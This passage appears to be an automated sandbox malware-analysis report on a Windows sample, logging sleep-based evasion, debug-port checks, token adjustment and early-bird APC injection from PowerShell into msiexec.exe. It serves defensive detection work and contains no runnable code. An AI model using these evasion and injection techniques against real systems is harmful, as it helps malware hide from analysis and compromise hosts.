Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -599404s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -599185s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -598486s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -597606s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -597497s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -597391s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -597282s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -597157s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -597032s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -596808s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688	Thread sleep time: -593985s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Code function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405974
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Code function: 0_2_004064C6 FindFirstFileW,FindClose,	0_2_004064C6
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599510	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599404	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599185	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598486	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597606	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597497	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597282	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597157	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597032	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596808	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: powershell.exe, 00000002.00000002.2178786128.0000000004E60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.2178786128.0000000004E60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\lq
Source: powershell.exe, 00000002.00000002.2178786128.0000000004E60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000009.00000002.2564635002.0000000009D37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW}o*
Source: msiexec.exe, 00000009.00000002.2564635002.0000000009D37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2178786128.0000000004E60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\lq
Source: powershell.exe, 00000002.00000002.2178786128.0000000004E60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\lq
Source: powershell.exe, 00000002.00000002.2178786128.0000000004E60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	API call chain: ExitProcess graph end node			graph_0-3613
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	API call chain: ExitProcess graph end node			graph_0-3605

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_0087F520 LdrInitializeThunk,LdrInitializeThunk,

2_2_0087F520

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4130000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
